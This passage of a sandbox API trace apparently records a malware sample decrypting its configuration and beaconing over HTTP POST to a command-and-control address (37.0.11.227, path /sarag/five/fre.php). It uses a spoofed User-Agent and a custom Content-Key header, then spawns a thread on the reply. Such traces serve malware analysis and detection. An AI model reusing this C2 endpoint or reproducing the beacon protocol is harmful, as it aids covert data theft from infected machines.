1 [0247.779] GetProcessHeap () returned 0x690000 [0247.779] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0247.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.780] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0247.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.781] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0247.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.783] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0247.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.784] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0247.784] GetProcessHeap () returned 0x690000 [0247.784] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0247.784] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0247.785] GetProcessHeap () returned 0x690000 [0247.785] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0247.786] GetProcessHeap () returned 0x690000 [0247.786] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0247.786] GetProcessHeap () returned 0x690000 [0247.786] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0247.790] GetProcessHeap () returned 0x690000 [0247.791] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0247.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.792] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0247.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.797] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0247.803] GetProcessHeap () returned 0x690000 [0247.803] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0247.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.805] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0247.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.806] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0247.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.807] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.807] GetProcessHeap () returned 0x690000 [0247.807] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0247.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.808] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0247.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.809] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0247.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.810] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0247.810] GetProcessHeap () returned 0x690000 [0247.810] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0247.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.811] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0247.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.812] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0247.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.813] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0247.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.814] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0247.814] GetProcessHeap () returned 0x690000 [0247.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0247.814] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0247.815] GetProcessHeap () returned 0x690000 [0247.815] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0247.815] socket (af=2, type=1, protocol=6) returned 0x6d4 [0247.815] connect (s=0x6d4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0247.843] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0247.856] GetProcessHeap () returned 0x690000 [0247.856] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0247.856] GetProcessHeap () returned 0x690000 [0247.856] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0247.857] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0247.869] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0247.869] GetProcessHeap () returned 0x690000 [0247.869] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0247.869] GetProcessHeap () returned 0x690000 [0247.870] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0247.870] GetProcessHeap () returned 0x690000 [0247.870] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0247.870] GetProcessHeap () returned 0x690000 [0247.870] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0247.871] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0247.872] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0247.872] GetProcessHeap () returned 0x690000 [0247.872] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0247.872] GetProcessHeap () returned 0x690000 [0247.872] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0247.873] send (s=0x6d4, buf=0x6ad508*, len=242, flags=0) returned 242 [0247.873] send (s=0x6d4, buf=0x6aba40*, len=159, flags=0) returned 159 [0247.873] GetProcessHeap () returned 0x690000 [0247.873] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0247.873] recv (in: s=0x6d4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0247.938] GetProcessHeap () returned 0x690000 [0247.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0247.939] GetProcessHeap () returned 0x690000 [0247.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0247.939] GetProcessHeap () returned 0x690000 [0247.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0247.939] GetProcessHeap () returned 0x690000 [0247.940] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0247.940] closesocket (s=0x6d4) returned 0 [0247.941] GetProcessHeap () returned 0x690000 [0247.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0247.941] GetProcessHeap () returned 0x690000 [0247.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0247.941] GetProcessHeap () returned 0x690000 [0247.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0247.942] GetProcessHeap () returned 0x690000 [0247.942] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0247.955] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x142c) returned 0x6d4 [0247.957] Sleep (dwMilliseconds=0xea60) [0247.958] GetProcessHeap () returned 0x690000 [0247.958] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0247.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.959] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0247.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.972] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0247.982] GetProcessHeap () returned 0x690000 [0247.982] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0247.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.983] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0247.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.984] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0247.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.985] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.986] GetProcessHeap () returned 0x690000 [0247.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0247.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.991] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0247.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.992] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0247.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.993] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0247.993] GetProcessHeap () returned 0x690000 [0247.993] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0247.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.994] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0247.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.995] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0247.996] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.996] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0247.997] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.997] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0247.997] GetProcessHeap () returned 0x690000 [0247.998] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0247.998] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0247.998] GetProcessHeap () returned 0x690000 [0247.998] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0247.998] GetProcessHeap () returned 0x690000 [0247.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0247.999] GetProcessHeap () returned 0x690000 [0247.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0248.000] GetProcessHeap () returned 0x690000 [0248.000] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0248.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.001] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0248.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.006] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0248.016] GetProcessHeap () returned 0x690000 [0248.016] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0248.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.017] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0248.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.018] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0248.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.019] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.019] GetProcessHeap () returned 0x690000 [0248.020] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0248.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.027] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0248.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.028] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0248.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.029] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0248.029] GetProcessHeap () returned 0x690000 [0248.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0248.030] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.030] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0248.031] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.031] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0248.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.035] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0248.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.036] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0248.036] GetProcessHeap () returned 0x690000 [0248.036] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0248.036] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0248.036] GetProcessHeap () returned 0x690000 [0248.036] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0248.036] socket (af=2, type=1, protocol=6) returned 0x6d8 [0248.036] connect (s=0x6d8, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0248.058] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0248.058] GetProcessHeap () returned 0x690000 [0248.058] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0248.058] GetProcessHeap () returned 0x690000 [0248.058] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0248.059] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0248.060] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0248.060] GetProcessHeap () returned 0x690000 [0248.060] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0248.060] GetProcessHeap () returned 0x690000 [0248.061] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0248.061] GetProcessHeap () returned 0x690000 [0248.061] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0248.061] GetProcessHeap () returned 0x690000 [0248.061] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0248.062] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0248.063] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0248.063] GetProcessHeap () returned 0x690000 [0248.063] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0248.063] GetProcessHeap () returned 0x690000 [0248.064] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0248.064] send (s=0x6d8, buf=0x6ad508*, len=242, flags=0) returned 242 [0248.064] send (s=0x6d8, buf=0x6aba40*, len=159, flags=0) returned 159 [0248.064] GetProcessHeap () returned 0x690000 [0248.064] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0248.064] recv (in: s=0x6d8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0248.137] GetProcessHeap () returned 0x690000 [0248.137] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0248.138] GetProcessHeap () returned 0x690000 [0248.138] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0248.138] GetProcessHeap () returned 0x690000 [0248.138] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0248.139] GetProcessHeap () returned 0x690000 [0248.139] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0248.139] closesocket (s=0x6d8) returned 0 [0248.140] GetProcessHeap () returned 0x690000 [0248.140] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0248.140] GetProcessHeap () returned 0x690000 [0248.140] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0248.140] GetProcessHeap () returned 0x690000 [0248.140] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0248.140] GetProcessHeap () returned 0x690000 [0248.140] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0248.144] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1430) returned 0x6d8 [0248.147] Sleep (dwMilliseconds=0xea60) [0248.149] GetProcessHeap () returned 0x690000 [0248.149] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0248.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.150] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0248.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.158] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0248.164] GetProcessHeap () returned 0x690000 [0248.164] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0248.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.165] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0248.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.166] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0248.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.167] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.167] GetProcessHeap () returned 0x690000 [0248.167] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0248.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.171] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0248.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.172] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0248.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.173] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0248.173] GetProcessHeap () returned 0x690000 [0248.173] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0248.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.174] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0248.174] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.175] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0248.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.175] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0248.176] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.176] StrStrA 